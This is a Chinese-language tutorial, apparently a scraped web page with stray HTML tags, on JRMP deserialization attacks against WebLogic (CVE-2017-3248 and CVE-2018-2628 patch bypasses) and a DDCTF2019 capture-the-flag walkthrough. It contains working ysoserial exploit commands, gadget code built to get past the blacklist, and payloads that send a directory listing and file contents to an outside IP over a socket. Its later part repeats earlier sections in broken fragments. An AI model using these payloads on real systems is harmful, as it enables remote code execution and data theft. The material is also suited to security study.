JRMP安全问题分析：从CVE到CTF实战<\/h1>

1. 环境搭建<\/h2>

version<\/span>: '2'<\/span>
<\/span><\/span>services<\/span>:
<\/span><\/span> weblogic<\/span>:
<\/span><\/span>   image<\/span>: vulhub\/weblogic<\/span>
<\/span><\/span>   ports<\/span>:
<\/span><\/span>     - "8453:8453"<\/span>
<\/span><\/span>     - "7001:7001"<\/span>
<\/span><\/span><\/code><\/pre>调试环境配置：<\/p>

修改\/root\/Oracle\/Middleware\/user_projects\/domains\/base_domain\/bin\/setDomainEnv.sh<\/code><\/li>
在if [ "${debugFlag}" = "true" ]<\/code>前添加：
debugFlag=<\/span>"true"<\/span>
<\/span><\/span>expport debugFlag
<\/span><\/span><\/code><\/pre><\/li>
重启服务并使用IDEA远程调试<\/li>
<\/ol>
2. 核心概念<\/h2>
2.1 JRMP协议<\/h3>
Java远程消息交换协议(Java Remote Messaging Protocol)，是Java技术特有的、用于查找和引用远程对象的协议，运行在RMI之下、TCP\/IP之上。<\/p>
2.2 RMI<\/h3>
远程方法调用(Remote Method Invocation)，J2SE的一部分，允许开发基于Java的分布式应用。RMI对象可以从另一个JVM（甚至跨网络）调用其方法。<\/p>
3. CVE-2017-3248分析<\/h2>
攻击流程<\/h3>

启动JRMP监听器：
java -cp ysoserial-exp.jar ysoserial.exploit.JRMPListener 9997<\/span> CommonsCollections1 "touch \/tmp\/exp"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
发送攻击载荷：
python exp.py 127.0.0.1 7001<\/span> ~\/Desktop\/漏洞环境\/weblogic\/ysoserial-exp.jar 10.13.66.158 9997<\/span> JRMPClient
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
关键代码分析<\/h3>
public<\/span> Registry getObject<\/span>(<\/span>final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 解析主机和端口
<\/span><\/span><\/span><\/span>    ObjID id =<\/span> new<\/span> ObjID(<\/span>new<\/span> Random().<\/span>nextInt<\/span>());<\/span> \/\/ RMI registry
<\/span><\/span><\/span><\/span>    TCPEndpoint te =<\/span> new<\/span> TCPEndpoint(<\/span>host,<\/span> port);<\/span>
<\/span><\/span>    UnicastRef ref =<\/span> new<\/span> UnicastRef(<\/span>new<\/span> LiveRef(<\/span>id,<\/span> te,<\/span> false<\/span>));<\/span>
<\/span><\/span>    RemoteObjectInvocationHandler obj =<\/span> new<\/span> RemoteObjectInvocationHandler(<\/span>ref);<\/span>
<\/span><\/span>    Registry proxy =<\/span> (<\/span>Registry)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>JRMPClient.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> 
<\/span><\/span>        new<\/span> Class[]<\/span> {<\/span> Registry.<\/span>class<\/span> },<\/span> obj);<\/span>
<\/span><\/span>    return<\/span> proxy;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>反序列化链<\/h3>

RemoteObject.readObject<\/code>被调用<\/li>
触发UnicastRef.readExternal<\/code><\/li>
建立到JRMP服务端的连接<\/li>
进入DGC的dirty方法打通Client和Server<\/li>
<\/ol>
4. CVE-2018-2628绕过<\/h2>
官方防御<\/h3>
在InboundMsgAbbrev.class<\/code>中添加resolveProxyClass<\/code>方法，禁止java.rmi.registry.Registry<\/code>接口的反序列化。<\/p>
绕过方法1：简化JRMPClient<\/h3>
public<\/span> Object getObject<\/span>(<\/span>final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 省略解析部分...
<\/span><\/span><\/span><\/span>    ObjID id =<\/span> new<\/span> ObjID(<\/span>new<\/span> Random().<\/span>nextInt<\/span>());<\/span>
<\/span><\/span>    TCPEndpoint te =<\/span> new<\/span> TCPEndpoint(<\/span>host,<\/span> port);<\/span>
<\/span><\/span>    UnicastRef ref =<\/span> new<\/span> UnicastRef(<\/span>new<\/span> LiveRef(<\/span>id,<\/span> te,<\/span> false<\/span>));<\/span>
<\/span><\/span>    return<\/span> ref;<\/span> \/\/ 直接返回UnicastRef，不使用代理
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>绕过方法2：使用其他接口(Activator)<\/h3>
public<\/span> Activator getObject<\/span>(<\/span>final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    \/\/ 省略解析部分...
<\/span><\/span><\/span><\/span>    RemoteObjectInvocationHandler obj =<\/span> new<\/span> RemoteObjectInvocationHandler(<\/span>ref);<\/span>
<\/span><\/span>    Activator proxy =<\/span> (<\/span>Activator)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>JRMPClient3.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> 
<\/span><\/span>        new<\/span> Class[]<\/span> {<\/span> Activator.<\/span>class<\/span> },<\/span> obj);<\/span>
<\/span><\/span>    return<\/span> proxy;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5. DDCTF2019 "再来一杯java"实战<\/h2>
漏洞点<\/h3>
存在反序列化操作，但使用了SerialKiller防御：<\/p>
ObjectInputStream ois =<\/span> new<\/span> SerialKiller(<\/span>bais,<\/span> this<\/span>.<\/span>serialKillerConf<\/span>.<\/span>getConfig<\/span>());<\/span>
<\/span><\/span><\/code><\/pre>SerialKiller防御机制<\/h3>
通过重写ObjectInputStream.resolveClass<\/code>方法实现黑名单机制，黑名单包含：<\/p>
<regexp><\/span>java\.rmi\.registry\.Registry$<\/regexp><\/span>
<\/span><\/span><\/code><\/pre>攻击步骤<\/h3>

使用URLDNS Gadget测试：
java -<\/span>jar ysoserial.<\/span>jar<\/span> URLDNS "http:\/\/yourdnslog.com"<\/span>
<\/span><\/span><\/code><\/pre><\/li>
修改Gadgets.java支持代码执行：
if<\/span>(!<\/span>command.<\/span>startsWith<\/span>(<\/span>"code:"<\/span>)){<\/span>
<\/span><\/span>    cmd =<\/span> "java.lang.Runtime.getRuntime().exec(\""<\/span> +<\/span>
<\/span><\/span>    command.<\/span>replaceAll<\/span>(<\/span>"\\\\"<\/span>,<\/span>"\\\\\\\\"<\/span>).<\/span>replaceAll<\/span>(<\/span>"\""<\/span>,<\/span> "\\\""<\/span>)<\/span> +<\/span>
<\/span><\/span>    "\");"<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>else<\/span>{<\/span>
<\/span><\/span>    cmd =<\/span> command.<\/span>substring<\/span>(<\/span>5<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
构造列目录payload：
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 9997<\/span> CommonsBeanutils1 'code:java.io.File file=new java.io.File("\/");java.io.File[] fileLists = file.listFiles();java.net.Socket s = new java.net.Socket("74.120.175.101",9998);for (int i = 0; i < fileLists.length; i++) {java.io.OutputStream out = s.getOutputStream();out.write(fileLists[i].getName().getBytes());out.write("\n".getBytes());}s.close();'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
读取flag：
java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 9997<\/span> CommonsBeanutils1 'code:java.io.File file = new java.io.File("\/flag\/flag_7ArPnpf3XW8Npsmj");java.io.InputStream in = null;in = new java.io.FileInputStream(file);int tempbyte;java.net.Socket s = new java.net.Socket("74.120.175.101",9998);while ((tempbyte = in.read()) != -1) {java.io.OutputStream out = s.getOutputStream();out.write(tempbyte);}in.close();s.close();'<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
6. 防御建议<\/h2>

更新WebLogic到最新版本<\/li>
限制T3协议的外部访问<\/li>
使用更严格的反序列化过滤器<\/li>
监控可疑的JRMP连接<\/li>
<\/ol>
7. 参考资源<\/h2>

CVE-2015-4852 Weblogic反序列化RCE分析<\/a><\/li>
WebLogic JRMP反序列化漏洞分析<\/a><\/li>
Java RMI详解<\/a><\/li>
动态代理机制<\/a><\/li>
JRMP反序列化深入分析<\/a><\/li>
SerialKiller绕过技术<\/a><\/li>
<\/ol>

JRMP安全问题分析：从CVE到CTF实战<\/h1>

2. 核心概念<\/h2>

2.1 JRMP协议<\/h3> Java远程消息交换协议(Java Remote Messaging Protocol)，是Java技术特有的、用于查找和引用远程对象的协议，运行在RMI之下、TCP\/IP之上。<\/p>

2.2 RMI<\/h3> 远程方法调用(Remote Method Invocation)，J2SE的一部分，允许开发基于Java的分布式应用。RMI对象可以从另一个JVM（甚至跨网络）调用其方法。<\/p>

3. CVE-2017-3248分析<\/h2>

4. CVE-2018-2628绕过<\/h2>

官方防御<\/h3> 在InboundMsgAbbrev.class<\/code>中添加resolveProxyClass<\/code>方法，禁止java.rmi.registry.Registry<\/code>接口的反序列化。<\/p>

5. DDCTF2019 "再来一杯java"实战<\/h2>

7. 参考资源<\/h2> CVE-2015-4852 Weblogic反序列化RCE分析<\/a><\/li> WebLogic JRMP反序列化漏洞分析<\/a><\/li> Java RMI详解<\/a><\/li> 动态代理机制<\/a><\/li> JRMP反序列化深入分析<\/a><\/li> SerialKiller绕过技术<\/a><\/li> <\/ol>

2.1 JRMP协议<\/h3>
Java远程消息交换协议(Java Remote Messaging Protocol)，是Java技术特有的、用于查找和引用远程对象的协议，运行在RMI之下、TCP\/IP之上。<\/p>

2.2 RMI<\/h3>
远程方法调用(Remote Method Invocation)，J2SE的一部分，允许开发基于Java的分布式应用。RMI对象可以从另一个JVM（甚至跨网络）调用其方法。<\/p>

官方防御<\/h3>
在`InboundMsgAbbrev.class<\/code>中添加resolveProxyClass<\/code>方法，禁止java.rmi.registry.Registry<\/code>接口的反序列化。<\/p>`

7. 参考资源<\/h2>

CVE-2015-4852 Weblogic反序列化RCE分析<\/a><\/li>
WebLogic JRMP反序列化漏洞分析<\/a><\/li>
Java RMI详解<\/a><\/li>
动态代理机制<\/a><\/li>
JRMP反序列化深入分析<\/a><\/li>
SerialKiller绕过技术<\/a><\/li> <\/ol>